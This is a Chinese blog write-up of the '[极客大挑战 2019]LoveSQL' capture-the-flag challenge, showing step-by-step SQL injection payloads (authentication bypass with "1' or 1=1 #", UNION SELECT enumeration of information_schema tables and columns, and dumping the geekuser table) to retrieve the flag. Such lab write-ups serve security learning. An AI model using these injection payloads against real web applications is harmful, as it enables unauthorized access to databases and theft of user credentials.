[极客大挑战 2019]LoveSQL

最新推荐文章于 2024-07-25 23:12:48 发布
最新推荐文章于 2024-07-25 23:12:48 发布
阅读量63 收藏
点赞数
文章标签: mysql web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55771794/article/details/118707535
版权

我们先尝试输入,看看是什么效果

1' or 1=1 #

我们好像得到了账户和密码,但是当我输入以后依然是这个界面 

密码我也暂时翻译不出来,那就继续注入的思路

尝试之后发现一共有三列

使用联合查询,发现在2,3的位置有回显

 

查库

 

admin ' union select 1,2,database() #

  查表

admin' union select 1,2,table_name from information_schema.tables where table_schema='geek' #

 

 查字段

admin' union select 1,2,column_name from information_schema.columns where table_name='geekuser' #

 使用limit 0,1 获得三列

但是我想看看列里面的东西时,却做不到了?????

admin' union select 1,2,concat_ws(0x7e,'id','username','password') from geek.geekuser limit 0,1#

只能看见第一列,表里面没有内容??

结果发现表好像用错了!!! 

再从这个表里看一看字段

好的!找到了flag,就在这个的最后

总结,查库的时候疏忽了,没有查完,可以用group_concat()函数,直接查询所有

这道题就是简单的查库查表查列查字段的应用,基础牢固就可以啦

 

 

 

 

 

 

 

 

 

 

Tang_y1
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web小项目-曼波生日录(Servlet+JSP+MySQL)
m0_75138009的博客
07-24 866
当记录条数过多时会自动出现滚轮,数据不会超出紫框。
MySql 主从同步会不会影响到SQL执行速度?
weixin_44892327的博客
07-24 826
作用:负责将主库的二进制日志(binary log)数据传输到从库。工作方式:当从库连接到主库时,主库会为每个连接的从库开启一个 Binlog Dump 线程。这个线程从主库的二进制日志中读取日志记录,并将其发送给从库。Binlog Dump 线程:将二进制日志传输给从库。Binlog Dump GTID 线程(在启用 GTID 模式时):处理 GTID 相关的复制任务。
《MySQL DBA 修炼之道》第四章 开发进阶
Trishia的博客
07-25 604
博主学习《MySQL DBA 修炼之道》结合自身理解的总结。主要讲解了范式、反范式、慢SQL查询、事务和锁等。
测试环境搭建整套大数据系统(十七:mysql同步,字段类型映射错误问题)
weixin_43446246的博客
07-24 437
mysql表hive表其中 type是字符串类型,但是yarn上一直报错number这个类是往int类型转才会使用到的。
MySQL中的CREATE EVENT 语句详解
u011565038的博客
07-24 591
CREATE EVENT语句在 MySQL 中用于创建一个事件调度器(Event Scheduler)的事件。事件调度器允许你安排数据库任务(如查询、数据更新等)在将来的某个时间点自动执行,或者根据特定的时间间隔重复执行。这对于需要定期执行的任务特别有用,比如数据清理、报表生成等。
[Mysql-DML数据操作语句]
2301_78794952的博客
07-23 1077
insert into student (sid,sname,birthday,ssex,classid) values(9,'张三','2007-1-1','男',1);insert into student(sname,ssex) values('某某1','男'),('某某2','女'),('某某3','男');insert into student values(9,'张三','2007-1-1','男',1);-- 将姓名为某某的生日改为1888-1-1。
详解Mysql InnoDB引擎 04
程序员进阶之路
07-24 700
InnoDB 是MySQL数据库管理系统的一个存储引擎,它为MySQL提供了事务处理、外键约束和并发控制等关系型数据库管理系统(RDBMS)中重要的功能。以下是关于InnoDB存储引擎的一些关键特点和特性:
Mysql中DML的几种操作
最新发布
m0_63227888的博客
07-25 349
DML(Data Manipulation Language,数据操纵语言)是SQL中用于添加、删除、更新和查询数据库记录的一类语句。
Mysql的索引
2401_84592402的博客
07-24 500
索引是一个排序的列表,在列表当中存储索引的值以及索引对应数据所在的物理行索引值和数据是一个映射关系。
mysqlbackup与xtrabackup的对比
cc20100608的专栏
07-24 332
在MySQL数据库管理中,备份是确保数据安全性和可恢复性的重要环节。在众多备份工具中,mysqlbackup和xtrabackup是两款备受关注的工具。本文将围绕这两款工具进行详细对比,以探讨它们的优缺点,并试图给出在何种场景下更适合使用哪款工具。
MySQL第五次作业
2201_75988692的博客
07-25 852
建立触发器,订单表中增加订单数量后,商品表商品数量同步减少对应的商品订单出数量,并测试。创建一个存储过程s3,有2个参数,传入部门号,返回该部门的平均工资。·建立触发器,实现功能:户取消订单,恢复商品表对应商品的数量。建立触发器,实现功能:户修改订单,商品表对应商品数量同步更新。·建立两个表:goods(商品表)、orders(订单表)('B0001','小楷本',2.8,210),('A0001','橡皮',2.5,100)('C0001',铅笔',1.2,120)在商品表中导入商品记录。
MySQL:增删改查、临时表、授权相关示例
变成我......
07-24 873
Linux系统下MySQL服务的增删改查、临时表、授权相关实例,以及相关概念的讲解
centos7 mysql 基本测试(7)主从并行简单测试
abc
07-25 412
centos7 mysql 基本测试(7)主从并行简单测试。
MySQL表的增删查改
Xpccccc的博客
07-25 724
MySQL表的增删查改
C++学习补充2:MySQL select 查询
ALex_zry的博客
07-24 879
区分大小写的数据库字符集和不区分大小写的字符集各自适用于不同的应用场景,主要取决于数据的语义和业务需求。MySQL 在默认情况下是区分大小写的,但是它的行为可能因配置和使用的字符集而有所不同。如果你需要确保查询不区分大小写,你可以在创建表或字段时指定不区分大小写的排序规则,或者在查询时使用。:在某些情况下,如果在存储过程或函数中使用了特定的字符集或排序规则,也可能影响查询的结果。这将确保即使在区分大小写的字符集上,查询也会以不区分大小写的方式执行。:如果你的数据库或表使用的字符集是区分大小写的(如。
Mysql 集群搭建 05
程序员进阶之路
07-25 650
Mycat是开源的、活跃的、基于Java语言编写的MySQL数据库中间件。可以像使用mysql一样来使用 mycat,对于开发人员来说根本感觉不到mycat的存在。开发人员只需要连接MyCat即可,而具体底层用到几台数据库,每一台数据库服务器里面存储了什么数据,都无需关心。具体的分库分表的策略,只需要在MyCat中配置即可。
【MySQL】数据库的存储引擎
tr6666的博客
07-24 476
数据库的存储引擎决定了如何存储、处理和检索数据,是数据库系统的核心组件之一。不同的存储引擎有着不同的存储结构和特性,适用于不同的使用场景。本文将详细介绍几种常见的MySQL存储引擎,它们的存储结构,以及各自的使用场景。InnoDB是MySQL的默认存储引擎,提供了事务安全的表,支持行级锁定和外键。InnoDB的主要特点是聚簇索引,表数据实际上存储在主键索引的叶子节点中。对于非主键索引,索引的叶子节点存储的是对应行数据的主键值,而不是行数据本身。MyISAM存储引擎使用了三种不同的文件来存储表数据。
mysql数据迁移,全量和增量
前方的路在刚开始
07-25 140
接下来将服务切换的B库。然后在从A库按照这个时间节点后的数据,输入到B库。首先我们选定一个时间为历史数据。将这部分的数据全部输入到B里。mysql是常用的数据库。数据迁移一般有2种,增量数据和历史数据。mysqlB是新的数据库,mysqlA是旧的数据库。假设我有2个数据库mysqlA和mysqlB。
Mysql的MHA
2401_84592402的博客
07-24 491
高可用模式下的故障切换,基于主从复制单点故障和主从复制不能切换的问题至少需要3台故障切换过程0~30秒vip地址,根据vip地址所在的主机,确定主备主 vip 备 vip主和备不是优先确定的,主从复制的时候确定了主,备是在MHA的过程中确定。
挑战 2019]LoveSQL 1
08-24
LoveSQL 1是挑战2019的一个题目,它是一个关于 SQL 查询语言的挑战。具体来说,LoveSQL 1要求参赛者编写一个 SQL 查询,从给定的表中获取满足特定条件的数据。这个挑战旨在考察参赛者对 SQL 语法和查询的理解...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值